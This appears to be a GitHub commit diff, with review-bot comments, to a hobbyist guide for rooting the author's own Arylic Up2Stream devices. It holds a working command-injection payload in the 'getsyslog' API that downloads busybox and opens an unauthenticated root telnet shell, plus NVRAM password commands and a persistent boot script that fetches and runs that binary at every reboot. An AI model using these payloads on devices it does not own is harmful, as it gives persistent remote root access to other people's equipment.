updated content

This commit is contained in:
Jan Wachsmuth 2024-01-02 23:51:50 +01:00 committed by GitHub
parent ca415766fd
commit 013e46ca44
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
4 changed files with 162 additions and 9 deletions

View file

@ -29,3 +29,6 @@ Information about the boot process, file systems including environment (NVRAM).
## Downgrade Firmware
The first version on my devices was 4.2.8020 from 2020/02/20 (20th of Feb 2020). That version still has some vulnerabilites to be able to get onto the CLI with telnet by pushing a single command to these devices. Although it is good when the vendor is providing upgrades with additional feature and security fixes, I'd still like to be able to "hack" into the CLI. Therefore I had to downgrade the firmware. [Downgrade Firmware](/Downgrade.md)
## Install Persistant Hook
When the device reboots, any changes in ramfs are lost, however there is a way to install a script or command so that it survives a reboot. [Install Persistant Hook](/persistant-hook.md)
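Review bot: spelling in the added headings and links: "vulnerabilites" (in the Downgrade Firmware paragraph) should be "vulnerabilities", and "Persistant" should be "Persistent" in both the heading and the link text; since the link target is `/persistant-hook.md` and that file is added in this same commit, renaming it to `persistent-hook.md` here keeps link and filename consistent. The Downgrade paragraph would also benefit from one sentence making the trade-off explicit: running the older 4.2.8020 build re-exposes the device to the command-injection issue on whatever network it sits on, so it should stay on an isolated segment.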

View file

@ -5,14 +5,15 @@ The command that has this vulnerability is **_"getsyslog"_**, see https://develo
The following code snippets are using the IP address 10.1.1.58 for my Arylic Up2Stream device and 10.1.1.22 for a web server running on my local MacMini.
```
curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash;"
curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+555+/tmp/bin/busybox;ln+-s/tmp/bin/busybox+/tmp/bin/telnetd;/tmp/bin/telnetd+telnetd+-l/bin/ash;"
```
The command above is executing the following commands on the device in addition to the "getsyslog" request:
```
mkdir /tmp/bin
wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q;
chmod 777 /tmp/bin/busybox;
/tmp/bin/busybox telnetd -l/bin/ash;
chmod 555 /tmp/bin/busybox;
ln -s /tmp/bin/busybox /tmp/bin/telnetd;
/tmp/bin/telnetd telnetd -l/bin/ash;
```
> **Note:**
> Don't forget to add a ";" at the end inside the quotes. Replace all spaces with "+".
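Review bot: the rendered command list after "The command above is executing the following commands" merges the two alternative curl invocations into one seven-line sequence, so it reads as if `chmod 777` plus `/tmp/bin/busybox telnetd …` and then `chmod 555`, `ln -s …` and `/tmp/bin/telnetd …` all run in order; split it into two blocks (one per curl line) or label the two variants. It is also worth stating next to the `wget` line that the busybox binary is fetched over plain HTTP with no integrity check and then executed on the device, so the host at 10.1.1.22 has to be trusted and reachable only from the same isolated network.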
@ -20,9 +21,3 @@ chmod 777 /tmp/bin/busybox;
The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere.
A version of busybox is provided here, but there is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need. See section **_Hardware and Firmware_** for more information. On my web server (10.1.1.22) I've created subdirectory ***/a31/bin*** and have copied the busybox binary to that directory
You may also redirect output and error output for telnetd:
```
curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;"
```
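Review bot: "A version of busybox is provided here" gives no link or path, and the sentence ending "copied the busybox binary to that directory" has no full stop; point to the actual file or directory in the repository and name the OpenWRT target the binary was built for, so a reader can check they are fetching a matching architecture. For the redirected-output variant, a sentence on what `/tmp/web` is and whether `cmd.out`/`cmd.err` end up reachable through the device's web interface would help readers decide whether those files need to be removed afterwards.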

View file

@ -380,6 +380,53 @@ ApCliChannel=6
# a similar output will provide
ralink_init show 2860
```
To read a specific variable from NVRAM or modify its value use these commands:
```
nvram_get 2860 HostName
nvram_get 2860 lan_ipaddr
nvram_get 2860 lan_netmask
# displays password admin and sets a new one
nvram_get 2860 Password
nvram_set Password newpassword
```
The commands are located here:
```
cd /bin
ls l
...
-rwxrwxr-x 1 1000 1000 33220 ralink_init
lrwxrwxrwx 1 1000 1000 11 nvram_set -> ralink_init
lrwxrwxrwx 1 1000 1000 11 nvram_get -> ralink_init
-rwxrwxr-x 1 1000 1000 7800 nvram_daemon
...
```
I found a documentation for these commands:
```
Usage:
a. get: nvram_get [<2860/rtdev>] <field>
b. set: nvram_set [<2860/rtdev>] <field>
c. init: ralink_init <command> [<platform>] [<file>]
<Commands>:
rt2860_nvram_show (display rt2860 values in nvram)
rtdev_nvram_show (display rtdev values in nvram)
show (display values in nvram for <platform>)
gen (generate config file from nvram for <platform> - does not work)
renew (replace nvram values for <platform> with <file>)
clear (??? clear all entries in nvram for - found in a different documentation)
<Platform>:
2860 - rt2860 station or the first Wi-Fi interface
rtdev - intelligent nic or the second Wi-Fi interface (not available for Linkplay A31)
<File>: File name for renew command
Example:
a. nvram_get 2860 SSID /* get the SSID */
b. nvram_set 2860 SSID ralink /* set the SSID to ralink */
c. ralink_init gen 2860 /* generate the RT2860 .dat file from NVRAM */
d. ralink_init show 2860 /* display the INIC configurations in NVRAM */
e. ralink_init renew 2860 ra.dat /* set NVRAM values for RT2860 platform according to ra.dat file */
f. nvram_daemon & /* start the nvram_daemon */
```
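Review bot: `nvram_set Password newpassword` omits the platform argument that every other invocation passes; per the usage block it should be `nvram_set 2860 Password newpassword`, and the usage line `b. set: nvram_set [<2860/rtdev>] <field>` should also list the `<value>` argument, as examples b and e do. `ls l` in the listing should be `ls -l`. Since these writes go to NVRAM and survive reboots, add a short caveat that the password read back by `nvram_get 2860 Password` should be changed from its shipped value and that `ralink_init renew` / `clear` replace or wipe the whole configuration, so `ralink_init show 2860` output should be saved before trying them.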

108
persistant-hook.md Normal file
View file

@ -0,0 +1,108 @@
# Install Persistant Hook
When the device reboots, any changes in ramfs are lost, but the device is using flash with squashfs and jffs2 file systems. I have not discovered how to modfiy and upload an image to squashfs, but with jffs2 there is a way to install a hook.
Below is an output of mount command (including modification of /etc_ro/web/cgi-bin directory, but that's not required to install a hook) and ***cat /proc/mtd*** output:
```
# mount
rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
proc on /proc type proc (rw,relatime)
none on /var type ramfs (rw,relatime)
none on /etc type ramfs (rw,relatime)
none on /tmp type ramfs (rw,relatime)
none on /media type ramfs (rw,relatime)
none on /sys type sysfs (rw,relatime)
none on /dev/pts type devpts (rw,relatime,mode=600)
mdev on /dev type ramfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,mode=600)
mdev on /dev type ramfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,mode=600)
/dev/mtdblock8 on /mnt type jffs2 (rw,relatime)
/dev/mtdblock9 on /vendor type jffs2 (rw,relatime)
none on /etc_ro/web/cgi-bin type ramfs (rw,relatime)
# cat /proc/mtd
dev: size erasesize name
mtd0: 01000000 00010000 "ALL"
mtd1: 00030000 00010000 "Bootloader"
mtd2: 00010000 00010000 "Config"
mtd3: 00010000 00010000 "Factory"
mtd4: 00200000 00010000 "bkKernel"
mtd5: 001df508 00010000 "Kernel"
mtd6: 00950af8 00010000 "RootFS"
mtd7: 00b30000 00010000 "Kernel_RootFS"
mtd8: 00080000 00010000 "user"
mtd9: 00200000 00010000 "user2"
#
```
The mtd9 device named "user2" is not erased at a reboot, because it contains play lists. It is mounted as /vendor and a hook can be installed in ***/vendor/user*** directory as described below. On the Up2Stream Pro device that I own that directory was already present and a script called ***user.sh*** was located in that directory.
> **Note:**
> Neither that directory nor the **user.sh*** script were installed on my Up2Stream Amp device by default. Both devices have the same software version 4.2.8020 from 2020/02/20 (20th of Feb 2020) and were downgraded from v4.6.415145, release date 2022/04/27.
Here's the file from the device where the script was already present (used to start a daemon called ***socket***):
```
# cat user.sh
#!/bin/sh
echo "runing custom's app socket.............."
sleep 5
chmod 777 /vendor/user/socket
sn=`ps -ef | grep /vendor/user/socket | grep -v grep |wc -l`
echo $sn
if [ $sn -eq 0 ]; then
/vendor/user/socket &
fi
# ######### additional code to install telnetd and more #############
# get telnetd from full version of busybox and start in background
mkdir /tmp/bin
wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q
chmod 555 /tmp/bin/busybox
ln -s /tmp/bin/busybox /tmp/bin/telnetd
sn=`ps | grep busybox | wc -l`
if [ $sn -eq 1 ]; then
killall busybox
fi
sn=`ps | grep telnetd | wc -l`
if [ $sn -eq 1 ]; then
killall telnetd
fi
/tmp/bin/telnetd telnetd -l/bin/ash &
# shut down WiFi
ifconfig apcli0 down
ifconfig ra0 down
sleep 60
ifconfig apcli0 down
echo "WiFi disabled!"
# Uncomment to disable sleep after 15 minutes
#while true; do sleep 60; echo 'AXX+MUT+000' >/dev/ttyS0; done &
```
For testing purpose, you may ***reboot*** and ***telnet*** to the device afterwards.
Here's the file from the device where the script was NOT present:
```
mkdir /vendor/user
cat <<\EOF > /vendor/user/user.sh
#!/bin/sh
# get telnetd from full version of busybox and start in background
wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q
chmod 777 /tmp/bin/busybox
/tmp/bin/busybox telnetd -l/bin/ash >/tmp/web/busybox.out 2>/tmp/web/busybox.err &
# shut down WiFi
ifconfig ra0 down
ifconfig apcli0 down
# Uncomment to disable sleep after 15 minutes
#while true; do sleep 60; echo 'AXX+MUT+000' >/dev/ttyS0; done &
EOF
chmod 755 /vendor/user/user.sh
cd /vendor/user
ls -l
```
So far, the device fetches the full version of busybook after each reboot. With ***df*** command you can verify the free space on each of the file systems.
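Review bot: in the second script (the `cat <<\EOF > /vendor/user/user.sh` block) `wget -O /tmp/bin/busybox …` runs without a preceding `mkdir /tmp/bin`; /tmp is a ramfs that is empty after every reboot (see the mount output above), so the download fails and telnetd never starts; add `mkdir -p /tmp/bin` before it, as the first script does. Two smaller points: `sn=\`ps | grep busybox | wc -l\`` counts the grep process itself (the earlier line uses `grep -v grep`), so the `-eq 1` tests fire when nothing is running, which is harmless but misleading; and "busybook" in the closing paragraph should be "busybox". Because user.sh on mtd9 runs at every boot and fetches and executes a binary over plain HTTP, state explicitly that anyone able to answer for 10.1.1.22 on that network gets code execution on the device at each reboot, and suggest at least comparing a checksum of the downloaded file against a known value before running it.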